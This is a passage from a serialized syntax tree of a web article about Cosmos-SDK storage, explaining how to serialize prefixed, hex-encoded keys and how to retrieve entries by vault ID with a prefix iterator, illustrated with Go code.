\"%s%d%s%s%s%s\"",{"type":28,"tag":116,"props":87320,"children":87321},{"style":266},[87322],{"type":33,"value":3178},{"type":28,"tag":116,"props":87324,"children":87325},{"class":245,"line":1254},[87326,87331],{"type":28,"tag":116,"props":87327,"children":87328},{"style":272},[87329],{"type":33,"value":87330},"        PositionMapPrefix",{"type":28,"tag":116,"props":87332,"children":87333},{"style":266},[87334],{"type":33,"value":3178},{"type":28,"tag":116,"props":87336,"children":87337},{"class":245,"line":1262},[87338,87342],{"type":28,"tag":116,"props":87339,"children":87340},{"style":272},[87341],{"type":33,"value":86333},{"type":28,"tag":116,"props":87343,"children":87344},{"style":266},[87345],{"type":33,"value":3178},{"type":28,"tag":116,"props":87347,"children":87348},{"class":245,"line":1294},[87349,87353],{"type":28,"tag":116,"props":87350,"children":87351},{"style":272},[87352],{"type":33,"value":86345},{"type":28,"tag":116,"props":87354,"children":87355},{"style":266},[87356],{"type":33,"value":3178},{"type":28,"tag":116,"props":87358,"children":87359},{"class":245,"line":1334},[87360,87364],{"type":28,"tag":116,"props":87361,"children":87362},{"style":272},[87363],{"type":33,"value":86357},{"type":28,"tag":116,"props":87365,"children":87366},{"style":266},[87367],{"type":33,"value":3178},{"type":28,"tag":116,"props":87369,"children":87370},{"class":245,"line":1372},[87371,87375],{"type":28,"tag":116,"props":87372,"children":87373},{"style":272},[87374],{"type":33,"value":86345},{"type":28,"tag":116,"props":87376,"children":87377},{"style":266},[87378],{"type":33,"value":3178},{"type":28,"tag":116,"props":87380,"children":87381},{"class":245,"line":1381},[87382,87386],{"type":28,"tag":116,"props":87383,"children":87384},{"style":272},[87385],{"type":33,"value":86380},{"type":28,"tag":116,"props":87387,"children":87388},{"style":266},[87389],{"type":33,"value":3178},{"type":28,"tag":116,"props":87391,"children":87392},{"class":245,"line":1389},[87393],{"type":28,"tag":116,"props":87394,"children":87395},{"style":266},[87396],{"type":33,"value":23574},{"type":28,"tag":116,"props":87398,"children":87399},{"class":245,"line":1425},[87400],{"type":28,"tag":116,"props":87401,"children":87402},{"style":266},[87403],{"type":33,"value":406},{"type":28,"tag":116,"props":87405,"children":87406},{"class":245,"line":1448},[87407],{"type":28,"tag":116,"props":87408,"children":87409},{"emptyLinePlaceholder":19},[87410],{"type":33,"value":1044},{"type":28,"tag":116,"props":87412,"children":87413},{"class":245,"line":1456},[87414],{"type":28,"tag":116,"props":87415,"children":87416},{"emptyLinePlaceholder":19},[87417],{"type":33,"value":1044},{"type":28,"tag":116,"props":87419,"children":87420},{"class":245,"line":1520},[87421,87425,87429],{"type":28,"tag":116,"props":87422,"children":87423},{"style":376},[87424],{"type":33,"value":75920},{"type":28,"tag":116,"props":87426,"children":87427},{"style":282},[87428],{"type":33,"value":86424},{"type":28,"tag":116,"props":87430,"children":87431},{"style":266},[87432],{"type":33,"value":3133},{"type":28,"tag":116,"props":87434,"children":87435},{"class":245,"line":1580},[87436,87440,87444],{"type":28,"tag":116,"props":87437,"children":87438},{"style":272},[87439],{"type":33,"value":84865},{"type":28,"tag":116,"props":87441,"children":87442},{"style":339},[87443],{"type":33,"value":76041},{"type":28,"tag":116,"props":87445,"children":87446},{"style":266},[87447],{"type":33,"value":3178},{"type":28,"tag":116,"props":87449,"children":87450},{"class":245,"line":1620},[87451,87455,87459,87463,87467,87471],{"type":28,"tag":116,"props":87452,"children":87453},{"style":272},[87454],{"type":33,"value":84877},{"type":28,"tag":116,"props":87456,"children":87457},{"style":266},[87458],{"type":33,"value":825},{"type":28,"tag":116,"props":87460,"children":87461},{"style":272},[87462],{"type":33,"value":86459},{"type":28,"tag":116,"props":87464,"children":87465},{"style":266},[87466],{"type":33,"value":75847},{"type":28,"tag":116,"props":87468,"children":87469},{"style":339},[87470],{"type":33,"value":84383},{"type":28,"tag":116,"props":87472,"children":87473},{"style":266},[87474],{"type":33,"value":3178},{"type":28,"tag":116,"props":87476,"children":87477},{"class":245,"line":1668},[87478,87482,87486,87490,87494],{"type":28,"tag":116,"props":87479,"children":87480},{"style":266},[87481],{"type":33,"value":76002},{"type":28,"tag":116,"props":87483,"children":87484},{"style":272},[87485],{"type":33,"value":71774},{"type":28,"tag":116,"props":87487,"children":87488},{"style":266},[87489],{"type":33,"value":75847},{"type":28,"tag":116,"props":87491,"children":87492},{"style":339},[87493],{"type":33,"value":84383},{"type":28,"tag":116,"props":87495,"children":87496},{"style":266},[87497],{"type":33,"value":844},{"type":28,"tag":116,"props":87499,"children":87500},{"class":245,"line":1677},[87501,87505,87509,87513],{"type":28,"tag":116,"props":87502,"children":87503},{"style":272},[87504],{"type":33,"value":85479},{"type":28,"tag":116,"props":87506,"children":87507},{"style":370},[87508],{"type":33,"value":76036},{"type":28,"tag":116,"props":87510,"children":87511},{"style":282},[87512],{"type":33,"value":85182},{"type":28,"tag":116,"props":87514,"children":87515},{"style":266},[87516],{"type":33,"value":3133},{"type":28,"tag":116,"props":87518,"children":87519},{"class":245,"line":1685},[87520,87524,87528],{"type":28,"tag":116,"props":87521,"children":87522},{"style":266},[87523],{"type":33,"value":86073},{"type":28,"tag":116,"props":87525,"children":87526},{"style":339},[87527],{"type":33,"value":84383},{"type":28,"tag":116,"props":87529,"children":87530},{"style":266},[87531],{"type":33,"value":3178},{"type":28,"tag":116,"props":87533,"children":87534},{"class":245,"line":1729},[87535,87539,87543,87547,87551,87555,87559,87563],{"type":28,"tag":116,"props":87536,"children":87537},{"style":272},[87538],{"type":33,"value":86089},{"type":28,"tag":116,"props":87540,"children":87541},{"style":266},[87542],{"type":33,"value":141},{"type":28,"tag":116,"props":87544,"children":87545},{"style":282},[87546],{"type":33,"value":85219},{"type":28,"tag":116,"props":87548,"children":87549},{"style":266},[87550],{"type":33,"value":313},{"type":28,"tag":116,"props":87552,"children":87553},{"style":282},[87554],{"type":33,"value":8807},{"type":28,"tag":116,"props":87556,"children":87557},{"style":266},[87558],{"type":33,"value":313},{"type":28,"tag":116,"props":87560,"children":87561},{"style":272},[87562],{"type":33,"value":85089},{"type":28,"tag":116,"props":87564,"children":87565},{"style":266},[87566],{"type":33,"value":85240},{"type":28,"tag":116,"props":87568,"children":87569},{"class":245,"line":1764},[87570],{"type":28,"tag":116,"props":87571,"children":87572},{"style":266},[87573],{"type":33,"value":23574},{"type":28,"tag":116,"props":87575,"children":87576},{"class":245,"line":1896},[87577,87581,87585,87589,87593,87597,87601,87605],{"type":28,"tag":116,"props":87578,"children":87579},{"style":272},[87580],{"type":33,"value":85210},{"type":28,"tag":116,"props":87582,"children":87583},{"style":266},[87584],{"type":33,"value":141},{"type":28,"tag":116,"props":87586,"children":87587},{"style":282},[87588],{"type":33,"value":85264},{"type":28,"tag":116,"props":87590,"children":87591},{"style":266},[87592],{"type":33,"value":313},{"type":28,"tag":116,"props":87594,"children":87595},{"style":272},[87596],{"type":33,"value":85173},{"type":28,"tag":116,"props":87598,"children":87599},{"style":266},[87600],{"type":33,"value":825},{"type":28,"tag":116,"props":87602,"children":87603},{"style":272},[87604],{"type":33,"value":85089},{"type":28,"tag":116,"props":87606,"children":87607},{"style":266},[87608],{"type":33,"value":2830},{"type":28,"tag":116,"props":87610,"children":87611},{"class":245,"line":1932},[87612],{"type":28,"tag":116,"props":87613,"children":87614},{"emptyLinePlaceholder":19},[87615],{"type":33,"value":1044},{"type":28,"tag":116,"props":87617,"children":87618},{"class":245,"line":1940},[87619,87623,87627,87631],{"type":28,"tag":116,"props":87620,"children":87621},{"style":272},[87622],{"type":33,"value":86616},{"type":28,"tag":116,"props":87624,"children":87625},{"style":370},[87626],{"type":33,"value":76036},{"type":28,"tag":116,"props":87628,"children":87629},{"style":282},[87630],{"type":33,"value":85182},{"type":28,"tag":116,"props":87632,"children":87633},{"style":266},[87634],{"type":33,"value":3133},{"type":28,"tag":116,"props":87636,"children":87637},{"class":245,"line":1948},[87638,87642,87646],{"type":28,"tag":116,"props":87639,"children":87640},{"style":266},[87641],{"type":33,"value":86073},{"type":28,"tag":116,"props":87643,"children":87644},{"style":339},[87645],{"type":33,"value":84383},{"type":28,"tag":116,"props":87647,"children":87648},{"style":266},[87649],{"type":33,"value":3178},{"type":28,"tag":116,"props":87651,"children":87652},{"class":245,"line":1957},[87653,87657,87661,87665,87669,87673,87677,87681],{"type":28,"tag":116,"props":87654,"children":87655},{"style":272},[87656],{"type":33,"value":86089},{"type":28,"tag":116,"props":87658,"children":87659},{"style":266},[87660],{"type":33,"value":141},{"type":28,"tag":116,"props":87662,"children":87663},{"style":282},[87664],{"type":33,"value":85219},{"type":28,"tag":116,"props":87666,"children":87667},{"style":266},[87668],{"type":33,"value":313},{"type":28,"tag":116,"props":87670,"children":87671},{"style":282},[87672],{"type":33,"value":8807},{"type":28,"tag":116,"props":87674,"children":87675},{"style":266},[87676],{"type":33,"value":313},{"type":28,"tag":116,"props":87678,"children":87679},{"style":272},[87680],{"type":33,"value":86459},{"type":28,"tag":116,"props":87682,"children":87683},{"style":266},[87684],{"type":33,"value":85240},{"type":28,"tag":116,"props":87686,"children":87687},{"class":245,"line":1970},[87688],{"type":28,"tag":116,"props":87689,"children":87690},{"style":266},[87691],{"type":33,"value":23574},{"type":28,"tag":116,"props":87693,"children":87694},{"class":245,"line":1987},[87695,87699,87703,87707,87711,87715,87719,87723],{"type":28,"tag":116,"props":87696,"children":87697},{"style":272},[87698],{"type":33,"value":85210},{"type":28,"tag":116,"props":87700,"children":87701},{"style":266},[87702],{"type":33,"value":141},{"type":28,"tag":116,"props":87704,"children":87705},{"style":282},[87706],{"type":33,"value":85264},{"type":28,"tag":116,"props":87708,"children":87709},{"style":266},[87710],{"type":33,"value":313},{"type":28,"tag":116,"props":87712,"children":87713},{"style":272},[87714],{"type":33,"value":86709},{"type":28,"tag":116,"props":87716,"children":87717},{"style":266},[87718],{"type":33,"value":825},{"type":28,"tag":116,"props":87720,"children":87721},{"style":272},[87722],{"type":33,"value":86459},{"type":28,"tag":116,"props":87724,"children":87725},{"style":266},[87726],{"type":33,"value":2830},{"type":28,"tag":116,"props":87728,"children":87729},{"class":245,"line":2003},[87730],{"type":28,"tag":116,"props":87731,"children":87732},{"emptyLinePlaceholder":19},[87733],{"type":33,"value":1044},{"type":28,"tag":116,"props":87735,"children":87736},{"class":245,"line":31949},[87737,87741,87745,87749,87753,87757],{"type":28,"tag":116,"props":87738,"children":87739},{"style":272},[87740],{"type":33,"value":86293},{"type":28,"tag":116,"props":87742,"children":87743},{"style":370},[87744],{"type":33,"value":76036},{"type":28,"tag":116,"props":87746,"children":87747},{"style":272},[87748],{"type":33,"value":81852},{"type":28,"tag":116,"props":87750,"children":87751},{"style":266},[87752],{"type":33,"value":141},{"type":28,"tag":116,"props":87754,"children":87755},{"style":282},[87756],{"type":33,"value":84841},{"type":28,"tag":116,"props":87758,"children":87759},{"style":266},[87760],{"type":33,"value":3133},{"type":28,"tag":116,"props":87762,"children":87763},{"class":245,"line":80570},[87764,87768],{"type":28,"tag":116,"props":87765,"children":87766},{"style":563},[87767],{"type":33,"value":87318},{"type":28,"tag":116,"props":87769,"children":87770},{"style":266},[87771],{"type":33,"value":3178},{"type":28,"tag":116,"props":87773,"children":87774},{"class":245,"line":80583},[87775,87780],{"type":28,"tag":116,"props":87776,"children":87777},{"style":272},[87778],{"type":33,"value":87779},"        AddressMapPrefix",{"type":28,"tag":116,"props":87781,"children":87782},{"style":266},[87783],{"type":33,"value":3178},{"type":28,"tag":116,"props":87785,"children":87786},{"class":245,"line":80591},[87787,87791],{"type":28,"tag":116,"props":87788,"children":87789},{"style":272},[87790],{"type":33,"value":86333},{"type":28,"tag":116,"props":87792,"children":87793},{"style":266},[87794],{"type":33,"value":3178},{"type":28,"tag":116,"props":87796,"children":87797},{"class":245,"line":80599},[87798,87802],{"type":28,"tag":116,"props":87799,"children":87800},{"style":272},[87801],{"type":33,"value":86345},{"type":28,"tag":116,"props":87803,"children":87804},{"style":266},[87805],{"type":33,"value":3178},{"type":28,"tag":116,"props":87807,"children":87808},{"class":245,"line":80607},[87809,87813],{"type":28,"tag":116,"props":87810,"children":87811},{"style":272},[87812],{"type":33,"value":86357},{"type":28,"tag":116,"props":87814,"children":87815},{"style":266},[87816],{"type":33,"value":3178},{"type":28,"tag":116,"props":87818,"children":87819},{"class":245,"line":80647},[87820,87824],{"type":28,"tag":116,"props":87821,"children":87822},{"style":272},[87823],{"type":33,"value":86345},{"type":28,"tag":116,"props":87825,"children":87826},{"style":266},[87827],{"type":33,"value":3178},{"type":28,"tag":116,"props":87829,"children":87830},{"class":245,"line":80655},[87831,87835],{"type":28,"tag":116,"props":87832,"children":87833},{"style":272},[87834],{"type":33,"value":86818},{"type":28,"tag":116,"props":87836,"children":87837},{"style":266},[87838],{"type":33,"value":3178},{"type":28,"tag":116,"props":87840,"children":87842},{"class":245,"line":87841},60,[87843],{"type":28,"tag":116,"props":87844,"children":87845},{"style":266},[87846],{"type":33,"value":23574},{"type":28,"tag":116,"props":87848,"children":87850},{"class":245,"line":87849},61,[87851],{"type":28,"tag":116,"props":87852,"children":87853},{"style":266},[87854],{"type":33,"value":406},{"type":28,"tag":29,"props":87856,"children":87857},{},[87858],{"type":33,"value":87859},"We now have a proper example of how to serialize storage keys.",{"type":28,"tag":29,"props":87861,"children":87862},{},[87863,87865,87870],{"type":33,"value":87864},"Nonetheless, there is more to storage than just this. As previously mentioned, storages are expected to support their original functionalities. In the case of ",{"type":28,"tag":98,"props":87866,"children":87868},{"className":87867},[],[87869],{"type":33,"value":66722},{"type":33,"value":87871},", data should still be retrievable through original keys.",{"type":28,"tag":29,"props":87873,"children":87874},{},[87875,87877,87883,87885,87890],{"type":33,"value":87876},"Let's look at a case where we want to retrieve all ",{"type":28,"tag":98,"props":87878,"children":87880},{"className":87879},[],[87881],{"type":33,"value":87882},"map[Username]map[PositionName]Position",{"type":33,"value":87884}," associated with a ",{"type":28,"tag":98,"props":87886,"children":87888},{"className":87887},[],[87889],{"type":33,"value":84753},{"type":33,"value":87891}," from the storage. How can we safely accomplish this?",{"type":28,"tag":29,"props":87893,"children":87894},{},[87895,87897,87902,87904,87910],{"type":33,"value":87896},"Fortunately, the Cosmos-SDK provides APIs to fetch all entries associated with a ",{"type":28,"tag":98,"props":87898,"children":87900},{"className":87899},[],[87901],{"type":33,"value":84824},{"type":33,"value":87903}," prefix. Below is an example of an attempt to fetch data with ",{"type":28,"tag":98,"props":87905,"children":87907},{"className":87906},[],[87908],{"type":33,"value":87909},"vaultId",{"type":33,"value":4160},{"type":28,"tag":234,"props":87912,"children":87914},{"code":87913,"language":75784,"meta":7,"className":75785,"style":7},"func FetchPositionMapWithVaultId(\n    vaultId uint64,\n) ([]map[Username]map[PositionName]Position) {\n    values := map[Username]map[PositionName]Position{}\n    i := sdk.KVStorePrefixIterator(\n        kvStore,\n        fmt.Sprintf(\"%s%d\", PositionMapPrefix, vaultId)\n    )\n    for ; i.Valid(); i.Next() {\n        k := strings.split(i.Key(), Seperator)\n\n        username := make([]byte, hex.DecodedLen(k[0]))\n        _, err := hex.Decode(username, k[0])\n        if err != nil {\n            return nil, err\n        }\n\n        positionName := make([]byte, hex.DecodedLen(k[1]))\n        _, err := hex.Decode(positionName, k[1])\n        if err != nil {\n            return nil, err\n        }\n\n        if entry, ok := values[username]; !ok {\n            values[username] = make(map[PositionName])\n        }\n\n        values[username][positionName] = Position {\n            data: iterator.Value(),\n        }\n    }\n    return values\n}\n",[87915],{"type":28,"tag":98,"props":87916,"children":87917},{"__ignoreMap":7},[87918,87934,87949,87998,88050,88079,88091,88137,88144,88190,88245,88252,88316,88377,88400,88419,88426,88433,88493,88552,88575,88594,88601,88608,88661,88709,88716,88723,88763,88792,88799,88806,88818],{"type":28,"tag":116,"props":87919,"children":87920},{"class":245,"line":246},[87921,87925,87930],{"type":28,"tag":116,"props":87922,"children":87923},{"style":376},[87924],{"type":33,"value":75920},{"type":28,"tag":116,"props":87926,"children":87927},{"style":282},[87928],{"type":33,"value":87929}," FetchPositionMapWithVaultId",{"type":28,"tag":116,"props":87931,"children":87932},{"style":266},[87933],{"type":33,"value":3133},{"type":28,"tag":116,"props":87935,"children":87936},{"class":245,"line":256},[87937,87941,87945],{"type":28,"tag":116,"props":87938,"children":87939},{"style":272},[87940],{"type":33,"value":84865},{"type":28,"tag":116,"props":87942,"children":87943},{"style":339},[87944],{"type":33,"value":76041},{"type":28,"tag":116,"props":87946,"children":87947},{"style":266},[87948],{"type":33,"value":3178},{"type":28,"tag":116,"props":87950,"children":87951},{"class":245,"line":293},[87952,87957,87961,87965,87969,87973,87977,87981,87985,87989,87994],{"type":28,"tag":116,"props":87953,"children":87954},{"style":266},[87955],{"type":33,"value":87956},") ([]",{"type":28,"tag":116,"props":87958,"children":87959},{"style":376},[87960],{"type":33,"value":66722},{"type":28,"tag":116,"props":87962,"children":87963},{"style":266},[87964],{"type":33,"value":347},{"type":28,"tag":116,"props":87966,"children":87967},{"style":339},[87968],{"type":33,"value":84770},{"type":28,"tag":116,"props":87970,"children":87971},{"style":266},[87972],{"type":33,"value":15074},{"type":28,"tag":116,"props":87974,"children":87975},{"style":376},[87976],{"type":33,"value":66722},{"type":28,"tag":116,"props":87978,"children":87979},{"style":266},[87980],{"type":33,"value":347},{"type":28,"tag":116,"props":87982,"children":87983},{"style":339},[87984],{"type":33,"value":84787},{"type":28,"tag":116,"props":87986,"children":87987},{"style":266},[87988],{"type":33,"value":15074},{"type":28,"tag":116,"props":87990,"children":87991},{"style":339},[87992],{"type":33,"value":87993},"Position",{"type":28,"tag":116,"props":87995,"children":87996},{"style":266},[87997],{"type":33,"value":844},{"type":28,"tag":116,"props":87999,"children":88000},{"class":245,"line":361},[88001,88006,88010,88014,88018,88022,88026,88030,88034,88038,88042,88046],{"type":28,"tag":116,"props":88002,"children":88003},{"style":272},[88004],{"type":33,"value":88005},"    values",{"type":28,"tag":116,"props":88007,"children":88008},{"style":370},[88009],{"type":33,"value":76036},{"type":28,"tag":116,"props":88011,"children":88012},{"style":376},[88013],{"type":33,"value":49290},{"type":28,"tag":116,"props":88015,"children":88016},{"style":266},[88017],{"type":33,"value":347},{"type":28,"tag":116,"props":88019,"children":88020},{"style":339},[88021],{"type":33,"value":84770},{"type":28,"tag":116,"props":88023,"children":88024},{"style":266},[88025],{"type":33,"value":15074},{"type":28,"tag":116,"props":88027,"children":88028},{"style":376},[88029],{"type":33,"value":66722},{"type":28,"tag":116,"props":88031,"children":88032},{"style":266},[88033],{"type":33,"value":347},{"type":28,"tag":116,"props":88035,"children":88036},{"style":339},[88037],{"type":33,"value":84787},{"type":28,"tag":116,"props":88039,"children":88040},{"style":266},[88041],{"type":33,"value":15074},{"type":28,"tag":116,"props":88043,"children":88044},{"style":339},[88045],{"type":33,"value":87993},{"type":28,"tag":116,"props":88047,"children":88048},{"style":266},[88049],{"type":33,"value":77717},{"type":28,"tag":116,"props":88051,"children":88052},{"class":245,"line":387},[88053,88058,88062,88066,88070,88075],{"type":28,"tag":116,"props":88054,"children":88055},{"style":272},[88056],{"type":33,"value":88057},"    i",{"type":28,"tag":116,"props":88059,"children":88060},{"style":370},[88061],{"type":33,"value":76036},{"type":28,"tag":116,"props":88063,"children":88064},{"style":272},[88065],{"type":33,"value":78261},{"type":28,"tag":116,"props":88067,"children":88068},{"style":266},[88069],{"type":33,"value":141},{"type":28,"tag":116,"props":88071,"children":88072},{"style":282},[88073],{"type":33,"value":88074},"KVStorePrefixIterator",{"type":28,"tag":116,"props":88076,"children":88077},{"style":266},[88078],{"type":33,"value":3133},{"type":28,"tag":116,"props":88080,"children":88081},{"class":245,"line":400},[88082,88087],{"type":28,"tag":116,"props":88083,"children":88084},{"style":272},[88085],{"type":33,"value":88086},"        kvStore",{"type":28,"tag":116,"props":88088,"children":88089},{"style":266},[88090],{"type":33,"value":3178},{"type":28,"tag":116,"props":88092,"children":88093},{"class":245,"line":614},[88094,88099,88103,88107,88111,88116,88120,88125,88129,88133],{"type":28,"tag":116,"props":88095,"children":88096},{"style":272},[88097],{"type":33,"value":88098},"        fmt",{"type":28,"tag":116,"props":88100,"children":88101},{"style":266},[88102],{"type":33,"value":141},{"type":28,"tag":116,"props":88104,"children":88105},{"style":282},[88106],{"type":33,"value":84841},{"type":28,"tag":116,"props":88108,"children":88109},{"style":266},[88110],{"type":33,"value":313},{"type":28,"tag":116,"props":88112,"children":88113},{"style":563},[88114],{"type":33,"value":88115},"\"%s%d\"",{"type":28,"tag":116,"props":88117,"children":88118},{"style":266},[88119],{"type":33,"value":825},{"type":28,"tag":116,"props":88121,"children":88122},{"style":272},[88123],{"type":33,"value":88124},"PositionMapPrefix",{"type":28,"tag":116,"props":88126,"children":88127},{"style":266},[88128],{"type":33,"value":825},{"type":28,"tag":116,"props":88130,"children":88131},{"style":272},[88132],{"type":33,"value":87909},{"type":28,"tag":116,"props":88134,"children":88135},{"style":266},[88136],{"type":33,"value":2830},{"type":28,"tag":116,"props":88138,"children":88139},{"class":245,"line":631},[88140],{"type":28,"tag":116,"props":88141,"children":88142},{"style":266},[88143],{"type":33,"value":23574},{"type":28,"tag":116,"props":88145,"children":88146},{"class":245,"line":665},[88147,88151,88156,88160,88164,88169,88173,88177,88181,88186],{"type":28,"tag":116,"props":88148,"children":88149},{"style":260},[88150],{"type":33,"value":2703},{"type":28,"tag":116,"props":88152,"children":88153},{"style":266},[88154],{"type":33,"value":88155}," ; ",{"type":28,"tag":116,"props":88157,"children":88158},{"style":272},[88159],{"type":33,"value":3408},{"type":28,"tag":116,"props":88161,"children":88162},{"style":266},[88163],{"type":33,"value":141},{"type":28,"tag":116,"props":88165,"children":88166},{"style":282},[88167],{"type":33,"value":88168},"Valid",{"type":28,"tag":116,"props":88170,"children":88171},{"style":266},[88172],{"type":33,"value":28103},{"type":28,"tag":116,"props":88174,"children":88175},{"style":272},[88176],{"type":33,"value":3408},{"type":28,"tag":116,"props":88178,"children":88179},{"style":266},[88180],{"type":33,"value":141},{"type":28,"tag":116,"props":88182,"children":88183},{"style":282},[88184],{"type":33,"value":88185},"Next",{"type":28,"tag":116,"props":88187,"children":88188},{"style":266},[88189],{"type":33,"value":1068},{"type":28,"tag":116,"props":88191,"children":88192},{"class":245,"line":713},[88193,88198,88202,88207,88211,88215,88219,88223,88227,88232,88236,88241],{"type":28,"tag":116,"props":88194,"children":88195},{"style":272},[88196],{"type":33,"value":88197},"        k",{"type":28,"tag":116,"props":88199,"children":88200},{"style":370},[88201],{"type":33,"value":76036},{"type":28,"tag":116,"props":88203,"children":88204},{"style":272},[88205],{"type":33,"value":88206}," strings",{"type":28,"tag":116,"props":88208,"children":88209},{"style":266},[88210],{"type":33,"value":141},{"type":28,"tag":116,"props":88212,"children":88213},{"style":282},[88214],{"type":33,"value":69663},{"type":28,"tag":116,"props":88216,"children":88217},{"style":266},[88218],{"type":33,"value":313},{"type":28,"tag":116,"props":88220,"children":88221},{"style":272},[88222],{"type":33,"value":3408},{"type":28,"tag":116,"props":88224,"children":88225},{"style":266},[88226],{"type":33,"value":141},{"type":28,"tag":116,"props":88228,"children":88229},{"style":282},[88230],{"type":33,"value":88231},"Key",{"type":28,"tag":116,"props":88233,"children":88234},{"style":266},[88235],{"type":33,"value":18038},{"type":28,"tag":116,"props":88237,"children":88238},{"style":272},[88239],{"type":33,"value":88240},"Seperator",{"type":28,"tag":116,"props":88242,"children":88243},{"style":266},[88244],{"type":33,"value":2830},{"type":28,"tag":116,"props":88246,"children":88247},{"class":245,"line":750},[88248],{"type":28,"tag":116,"props":88249,"children":88250},{"emptyLinePlaceholder":19},[88251],{"type":33,"value":1044},{"type":28,"tag":116,"props":88253,"children":88254},{"class":245,"line":779},[88255,88260,88264,88268,88273,88277,88281,88285,88289,88294,88298,88303,88307,88311],{"type":28,"tag":116,"props":88256,"children":88257},{"style":272},[88258],{"type":33,"value":88259},"        username",{"type":28,"tag":116,"props":88261,"children":88262},{"style":370},[88263],{"type":33,"value":76036},{"type":28,"tag":116,"props":88265,"children":88266},{"style":282},[88267],{"type":33,"value":85182},{"type":28,"tag":116,"props":88269,"children":88270},{"style":266},[88271],{"type":33,"value":88272},"([]",{"type":28,"tag":116,"props":88274,"children":88275},{"style":339},[88276],{"type":33,"value":84383},{"type":28,"tag":116,"props":88278,"children":88279},{"style":266},[88280],{"type":33,"value":825},{"type":28,"tag":116,"props":88282,"children":88283},{"style":272},[88284],{"type":33,"value":85255},{"type":28,"tag":116,"props":88286,"children":88287},{"style":266},[88288],{"type":33,"value":141},{"type":28,"tag":116,"props":88290,"children":88291},{"style":282},[88292],{"type":33,"value":88293},"DecodedLen",{"type":28,"tag":116,"props":88295,"children":88296},{"style":266},[88297],{"type":33,"value":313},{"type":28,"tag":116,"props":88299,"children":88300},{"style":272},[88301],{"type":33,"value":88302},"k",{"type":28,"tag":116,"props":88304,"children":88305},{"style":266},[88306],{"type":33,"value":347},{"type":28,"tag":116,"props":88308,"children":88309},{"style":350},[88310],{"type":33,"value":353},{"type":28,"tag":116,"props":88312,"children":88313},{"style":266},[88314],{"type":33,"value":88315},"]))\n",{"type":28,"tag":116,"props":88317,"children":88318},{"class":245,"line":796},[88319,88323,88327,88331,88335,88340,88344,88349,88353,88357,88361,88365,88369,88373],{"type":28,"tag":116,"props":88320,"children":88321},{"style":272},[88322],{"type":33,"value":27403},{"type":28,"tag":116,"props":88324,"children":88325},{"style":266},[88326],{"type":33,"value":825},{"type":28,"tag":116,"props":88328,"children":88329},{"style":272},[88330],{"type":33,"value":1907},{"type":28,"tag":116,"props":88332,"children":88333},{"style":370},[88334],{"type":33,"value":76036},{"type":28,"tag":116,"props":88336,"children":88337},{"style":272},[88338],{"type":33,"value":88339}," hex",{"type":28,"tag":116,"props":88341,"children":88342},{"style":266},[88343],{"type":33,"value":141},{"type":28,"tag":116,"props":88345,"children":88346},{"style":282},[88347],{"type":33,"value":88348},"Decode",{"type":28,"tag":116,"props":88350,"children":88351},{"style":266},[88352],{"type":33,"value":313},{"type":28,"tag":116,"props":88354,"children":88355},{"style":272},[88356],{"type":33,"value":85089},{"type":28,"tag":116,"props":88358,"children":88359},{"style":266},[88360],{"type":33,"value":825},{"type":28,"tag":116,"props":88362,"children":88363},{"style":272},[88364],{"type":33,"value":88302},{"type":28,"tag":116,"props":88366,"children":88367},{"style":266},[88368],{"type":33,"value":347},{"type":28,"tag":116,"props":88370,"children":88371},{"style":350},[88372],{"type":33,"value":353},{"type":28,"tag":116,"props":88374,"children":88375},{"style":266},[88376],{"type":33,"value":55059},{"type":28,"tag":116,"props":88378,"children":88379},{"class":245,"line":847},[88380,88384,88388,88392,88396],{"type":28,"tag":116,"props":88381,"children":88382},{"style":260},[88383],{"type":33,"value":2943},{"type":28,"tag":116,"props":88385,"children":88386},{"style":272},[88387],{"type":33,"value":48142},{"type":28,"tag":116,"props":88389,"children":88390},{"style":370},[88391],{"type":33,"value":64006},{"type":28,"tag":116,"props":88393,"children":88394},{"style":376},[88395],{"type":33,"value":81537},{"type":28,"tag":116,"props":88397,"children":88398},{"style":266},[88399],{"type":33,"value":1291},{"type":28,"tag":116,"props":88401,"children":88402},{"class":245,"line":898},[88403,88407,88411,88415],{"type":28,"tag":116,"props":88404,"children":88405},{"style":260},[88406],{"type":33,"value":1017},{"type":28,"tag":116,"props":88408,"children":88409},{"style":376},[88410],{"type":33,"value":81537},{"type":28,"tag":116,"props":88412,"children":88413},{"style":266},[88414],{"type":33,"value":825},{"type":28,"tag":116,"props":88416,"children":88417},{"style":272},[88418],{"type":33,"value":83257},{"type":28,"tag":116,"props":88420,"children":88421},{"class":245,"line":907},[88422],{"type":28,"tag":116,"props":88423,"children":88424},{"style":266},[88425],{"type":33,"value":1954},{"type":28,"tag":116,"props":88427,"children":88428},{"class":245,"line":981},[88429],{"type":28,"tag":116,"props":88430,"children":88431},{"emptyLinePlaceholder":19},[88432],{"type":33,"value":1044},{"type":28,"tag":116,"props":88434,"children":88435},{"class":245,"line":1011},[88436,88441,88445,88449,88453,88457,88461,88465,88469,88473,88477,88481,88485,88489],{"type":28,"tag":116,"props":88437,"children":88438},{"style":272},[88439],{"type":33,"value":88440},"        positionName",{"type":28,"tag":116,"props":88442,"children":88443},{"style":370},[88444],{"type":33,"value":76036},{"type":28,"tag":116,"props":88446,"children":88447},{"style":282},[88448],{"type":33,"value":85182},{"type":28,"tag":116,"props":88450,"children":88451},{"style":266},[88452],{"type":33,"value":88272},{"type":28,"tag":116,"props":88454,"children":88455},{"style":339},[88456],{"type":33,"value":84383},{"type":28,"tag":116,"props":88458,"children":88459},{"style":266},[88460],{"type":33,"value":825},{"type":28,"tag":116,"props":88462,"children":88463},{"style":272},[88464],{"type":33,"value":85255},{"type":28,"tag":116,"props":88466,"children":88467},{"style":266},[88468],{"type":33,"value":141},{"type":28,"tag":116,"props":88470,"children":88471},{"style":282},[88472],{"type":33,"value":88293},{"type":28,"tag":116,"props":88474,"children":88475},{"style":266},[88476],{"type":33,"value":313},{"type":28,"tag":116,"props":88478,"children":88479},{"style":272},[88480],{"type":33,"value":88302},{"type":28,"tag":116,"props":88482,"children":88483},{"style":266},[88484],{"type":33,"value":347},{"type":28,"tag":116,"props":88486,"children":88487},{"style":350},[88488],{"type":33,"value":1824},{"type":28,"tag":116,"props":88490,"children":88491},{"style":266},[88492],{"type":33,"value":88315},{"type":28,"tag":116,"props":88494,"children":88495},{"class":245,"line":1029},[88496,88500,88504,88508,88512,88516,88520,88524,88528,88532,88536,88540,88544,88548],{"type":28,"tag":116,"props":88497,"children":88498},{"style":272},[88499],{"type":33,"value":27403},{"type":28,"tag":116,"props":88501,"children":88502},{"style":266},[88503],{"type":33,"value":825},{"type":28,"tag":116,"props":88505,"children":88506},{"style":272},[88507],{"type":33,"value":1907},{"type":28,"tag":116,